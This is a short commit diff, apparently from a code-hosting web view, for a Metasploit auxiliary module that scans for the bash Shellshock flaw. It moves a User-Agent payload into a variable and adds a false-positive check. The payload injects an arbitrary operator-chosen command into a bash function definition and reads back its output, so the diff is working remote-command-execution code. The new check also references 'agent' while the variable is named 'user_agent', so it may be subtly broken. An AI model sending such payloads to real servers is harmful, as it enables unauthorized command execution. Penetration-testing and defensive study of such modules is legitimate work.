Improve false positive check
parent
8daf8d4339
commit
b1e9b3664e
|
@ -42,13 +42,16 @@ class Metasploit4 < Msf::Auxiliary
|
||||||
|
|
||||||
def run_host(ip)
|
def run_host(ip)
|
||||||
marker = Rex::Text.rand_text_alphanumeric(rand(42) + 1)
|
marker = Rex::Text.rand_text_alphanumeric(rand(42) + 1)
|
||||||
|
user_agent = %Q{() { :; }; echo "#{marker}$(#{datastore['CMD']})#{marker}"}
|
||||||
|
|
||||||
res = send_request_raw(
|
res = send_request_raw(
|
||||||
'method' => datastore['METHOD'],
|
'method' => datastore['METHOD'],
|
||||||
'uri' => normalize_uri(target_uri.path),
|
'uri' => normalize_uri(target_uri.path),
|
||||||
'agent' => %Q{() { :; }; echo "#{marker}$(#{datastore['CMD']})#{marker}"}
|
'agent' => user_agent
|
||||||
)
|
)
|
||||||
|
|
||||||
|
return if (res && res.body.include?(agent))
|
||||||
|
|
||||||
if res && res.body =~ /#{marker}(.+)#{marker}/m
|
if res && res.body =~ /#{marker}(.+)#{marker}/m
|
||||||
print_good("#{peer} - #{$1}")
|
print_good("#{peer} - #{$1}")
|
||||||
report_vuln(
|
report_vuln(
|
||||||
|
|
Loading…
Reference in New Issue